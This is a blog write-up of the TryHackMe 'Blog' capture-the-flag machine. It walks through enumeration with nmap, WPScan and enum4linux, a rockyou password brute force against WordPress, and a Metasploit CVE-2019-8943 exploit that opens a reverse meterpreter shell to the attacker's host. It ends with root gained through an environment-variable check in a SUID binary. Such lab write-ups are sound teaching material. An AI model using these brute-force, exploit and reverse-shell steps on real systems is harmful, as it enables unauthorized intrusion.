The first in “hopefully” many posts covering vulnerable machines from TryHackMe, HackTheBox, root-me, etc.
Our box description reads, “Billy Joel made a blog on his home computer and has started working on it. It’s going to be so awesome! Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole…“. This box was also tagged with “wordpress“, “blog“, “web“, and importantly “cve 2019-8943“. We should make a note of this as we enumerate. There is also footnote: “In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file.“, so make sure to update /etc/hosts.
We’ll start off with the basic nmap scan:
odin@asgard:~$ nmap -sC -sV 10.10.119.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 11:17 EDT
Nmap scan report for blog.thm (10.10.119.194)
Host is up (0.089s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| 256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
|_ 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel’s IT Blog – The IT blog
139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: blog
| NetBIOS computer name: BLOG\x00
| Domain name: \x00
| FQDN: blog
|_ System time: 2020-10-08T15:17:42+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-08T15:17:43
|_ start_date: N/A
We have typical ssh on 22, web server on 80, and SMB on 139/445. Nmap has already identified that we’re looking at a WordPress 5.0 instance on the web server. Since this is a WordPress site, let’s run WPScan against it to see what we can find (we could also dirb/gobuster the web server, but we’ll circle back on this if nothing comes up):
odin@asgard:~$ wpscan –url 10.10.119.194
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/|_____/ \___|\__,_|_|
WordPress Security Scanner by the WPScan Team
Version 3.8.7
Sponsored by Automattic – https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://10.10.119.194/ [10.10.119.194]
[+] Started: Thu Oct 8 11:17:47 2020Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%[+] robots.txt found: http://10.10.119.194/robots.txt
| Interesting Entries:
| – /wp-admin/
| – /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%[+] XML-RPC seems to be enabled: http://10.10.119.194/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| – http://codex.wordpress.org/XML-RPC_Pingback_API
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| – https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| – https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] WordPress readme found: http://10.10.119.194/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] Upload directory has listing enabled: http://10.10.119.194/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://10.10.119.194/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| – https://www.iplocation.net/defend-wordpress-from-ddos
| – https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| – http://10.10.119.194/, Match: ‘wp-includes\/js\/wp-emoji-release.min.js?ver=5.0’
| Confirmed By: Meta Generator (Passive Detection)
| – http://10.10.119.194/, Match: ‘WordPress 5.0’[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups – Time: 00:00:00 <=====================================> (21 / 21) 100.00% Time: 00:00:00[i] No Config Backups Found.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up[+] Finished: Thu Oct 8 11:17:54 2020
[+] Requests Done: 45
[+] Cached Requests: 5
[+] Data Sent: 9.474 KB
[+] Data Received: 126.913 KB
[+] Memory used: 192.367 MB
[+] Elapsed time: 00:00:07
Perfect. So, let’s use WPScan to enumerate logins (excess lines removed):
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs – Time: 00:00:00 <=============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:
[+] bjoel
| Found By: Wp Json Api (Aggressive Detection)
| – http://10.10.119.194/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing – Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[+] kwheel
| Found By: Wp Json Api (Aggressive Detection)
| – http://10.10.119.194/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing – Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[+] Karen Wheeler
| Found By: Rss Generator (Aggressive Detection)[+] Billy Joel
| Found By: Rss Generator (Aggressive Detection)
Interesting. We’ve found 2 users: bjoel and kwheel. We know based on the tags and the version (WordPress version 5.0 identified (Insecure, released on 2018-12-06)) that we should most likely be targeting these specifically, the version and an authenticated login. We can check out the Samba share while we’re at it, but this is most likely a dead end.
odin@asgard:~$ enum4linux 10.10.119.194
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Oct 8 12:12:40 2020==========================
| Target Information |
==========================
Target ……….. 10.10.119.194
RID Range …….. 500-550,1000-1050
Username ……… ”
Password ……… ”
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.119.194 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP=============================================
| Nbtstat Information for 10.10.119.194 |
=============================================
Looking up status of 10.10.119.194
BLOG <00> – B <ACTIVE> Workstation Service
BLOG <03> – B <ACTIVE> Messenger Service
BLOG <20> – B <ACTIVE> File Server Service
..__MSBROWSE__. <01> – <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> – <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> – B <ACTIVE> Master Browser
WORKGROUP <1e> – <GROUP> B <ACTIVE> Browser Service ElectionsMAC Address = 00-00-00-00-00-00
======================================
| Session Check on 10.10.119.194 |
======================================
[+] Server 10.10.119.194 allows sessions using username ”, password ”============================================
| Getting domain SID for 10.10.119.194 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can’t determine if host is part of domain or part of a workgroup=======================================
| OS information on 10.10.119.194 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.119.194 from smbclient:
[+] Got OS info for 10.10.119.194 from srvinfo:
BLOG Wk Sv PrQ Unx NT SNT blog server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03==============================
| Users on 10.10.119.194 |
==============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.==========================================
| Share Enumeration on 10.10.119.194 |
==========================================Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
BillySMB Disk Billy’s local SMB Share
IPC$ IPC IPC Service (blog server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.Server Comment
——— ——-
BLOG blog server (Samba, Ubuntu)Workgroup Master
——— ——-
WORKGROUP BLOG[+] Attempting to map shares on 10.10.119.194
//10.10.119.194/print$ Mapping: DENIED, Listing: N/A
//10.10.119.194/BillySMB Mapping: OK, Listing: OK
//10.10.119.194/IPC$ [E] Can’t understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
BillySMB…Let’s smbclient this:
odin@asgard:~$ smbclient //10.10.119.194/BillySMB
Enter WORKGROUP\odin’s password:
Try “help” to get a list of possible commands.
smb: \> ls
. D 0 Tue May 26 14:17:05 2020
.. D 0 Tue May 26 13:58:23 2020
Alice-White-Rabbit.jpg N 33378 Tue May 26 14:17:01 2020
tswift.mp4 N 1236733 Tue May 26 14:13:45 2020
check-this.png N 3082 Tue May 26 14:13:43 202015413192 blocks of size 1024. 9789876 blocks available
White Rabbit…yeah, a dead end here. Let’s head back to the WordPress route. We can try brute forcing the login(s) using WPScan (excess lines removed):
odin@asgard:~$ wpscan –url 10.10.119.194 –passwords /usr/share/wordlists/rockyou.txt
…
User(s) Identified:
[+] bjoel
| Found By: Wp Json Api (Aggressive Detection)
| – http://10.10.119.194/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing – Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[+] kwheel
| Found By: Wp Json Api (Aggressive Detection)
| – http://10.10.119.194/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing – Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[+] Karen Wheeler
| Found By: Rss Generator (Aggressive Detection)[+] Billy Joel
| Found By: Rss Generator (Aggressive Detection)[+] Performing password attack on Xmlrpc against 4 user/s
[SUCCESS] – kwheel / *redacted*
Awesome! We have success via rockyou.txt. Now, this was early on the list, but this password is also available on rockyou-40,45,50,55,60,65,70,75. Those would be somewhat quicker, if you want to narrrow your own search. Once we’ve logged in, we know based on the WordPress version that we can utilize CVE-2019-8943. Lucky for us, this is already available in Metasploit (see https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce). However, there are plenty of videos (https://www.youtube.com/watch?v=6Sxs4vQJK_s) and blogs (https://pentest-tools.com/blog/wordpress-remote-code-execution-exploit-cve-2019-8942/) to outline the process before this module was added. Since the video and additional tutorial cover this in better detail, we’ll continue on with the module route for ease and speed purposes.
msf5 > use exploit/multi/http/wp_crop_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(multi/http/wp_crop_rce) > set RHOSTS 10.10.119.194
RHOSTS => 10.10.119.194
msf5 exploit(multi/http/wp_crop_rce) > set LHOST 10.6.22.82
LHOST => 10.6.22.82
msf5 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf5 exploit(multi/http/wp_crop_rce) > set PASSWORD *redacted*
PASSWORD => *redacted*msf5 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 10.6.22.82:4444
[*] Authenticating with WordPress using kwheel:*redacted*…
[+] Authenticated with WordPress
[*] Preparing payload…
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38288 bytes) to 10.10.119.194
[*] Meterpreter session 1 opened (10.6.22.82:4444 -> 10.10.119.194:47310) at 2020-10-08 14:15:08 -0400
[*] Attempting to clean up files…meterpreter >
Perfect! We’re in.
meterpreter > shell
Process 1568 created.
Channel 1 created.
Nobody likes an ugly shell…
python -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@blog:/var/www/wordpress$
Much nicer. No need for ‘whoami’ or ‘pwd’. We sit as www-data, within ‘/var/www/wordpress’. Now, where is our user.txt flag? Usually these sit in someone’s home directory.
www-data@blog:/var/www/wordpress$ ls /home/
ls /home/
bjoel
www-data@blog:/var/www/wordpress$ cd /home/bjoel/
cd /home/bjoel/
www-data@blog:/home/bjoel$ ls
ls
Billy_Joel_Termination_May20-2020.pdf user.txt
www-data@blog:/home/bjoel$ cat user.txt
cat user.txt
You won’t find what you’re looking for here.TRY HARDER
Lovely, a ‘but our princess is in another castle’ scenario. I was also curious about the ‘user termination’ PDF. After examining it, it seems Mr. Joel may have owned a Rubber Ducky… more on that near the end. For now, let’s download ‘linpeas‘ onto our target box, and see if we find anything “interesting”, we’ll look for the flag files later.
====================================( Interesting Files )=====================================
[+] SUID – Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
/usr/bin/passwd —> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/usr/bin/newgrp —> HP-UX_10.20
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec —> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/chfn —> SuSE_9.3/10
/usr/bin/sudo —> /sudo$
/usr/bin/at —> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/usr/sbin/checker
There is much more to this list, but we’ll cut out the additional searching for reading sake (Try this yourself! See how LinPEAS can make things easier..sometimes). https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ is a great resource with MANY items to look for when trying to obtain basic Linux privilege escalations. After going through the list a bit, I ran find / -perm -u=s -type f 2>/dev/null to look for SUID files. We again see ‘/usr/sbin/checker’, which is something I’m not familiar with. A quick Google search for ‘common Unix binaries’ or ‘vulnerable Unix binaries’ returns many results pointing to https://gtfobins.github.io/. ‘checker’ doesn’t appear on this, so now I’m curious.
I try to run ‘checker’ to see what happens:
www-data@blog:/home/bjoel$ checker
Not an Admin
Not an Admin….makes sense. What sort of file is this?
www-data@blog:/usr/sbin$ file checker
checker: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6cdb17533a6e02b838336bfe9791b5d57e1e2eea, not stripped
Ok, I am no Unix wizard at all. So after about 45 minutes of Googling, I have run a few different applications (xxd, objdump, etc.) to see exactly what this program is doing. Realizing it’s performing library calls (all the GLIBC references), we come to ‘ltrace‘
www-data@blog:/usr/sbin$ ltrace checker
ltrace checker
getenv(“admin”) = nil
puts(“Not an Admin”Not an Admin
) = 13
+++ exited (status 0) +++
So I may have interpreted this incorrectly, but I took “nil” to be “null”, or “0”. Now having a more general understanding of how this is working, we do the following:
www-data@blog:/usr/sbin$ checker
checker
Not an Admin
www-data@blog:/usr/sbin$ export admin=1
export admin=1
www-data@blog:/usr/sbin$ checker
checker
root@blog:/usr/sbin#
We have root! Let’s find some flags.
root@blog:/# find / | grep “user.txt”
find / | grep “user.txt”
/home/bjoel/user.txt
/media/usb/user.txt
find: ‘/proc/1441/task/1441/net’: Invalid argument
find: ‘/proc/1441/net’: Invalid argument
A second user.txt flag…
root@blog:/# cat /media/usb/user.txt
cat /media/usb/user.txt
****************************8ab7
/media/usb/, I see we’ve found said ‘rubber ducky’ from before. This all makes sense now. How about root.txt
root@blog:/# find / | grep “root.txt”
find / | grep “root.txt”
/root/root.txt
find: ‘/proc/1441/task/1441/net’: Invalid argument
find: ‘/proc/1441/net’: Invalid argument
root@blog:/# cat /root/root.txt
cat /root/root.txt
****************************f318
Overall, this was a fun box, rated at a medium difficulty. The initial exploit and access wasn’t too bad. However, the privesc located within an unknown executable was a challenge. I did have to extend the box time out to research how exactly to see what the program did.
Middle of the Web 
One thought on “TryHackMe – Blog”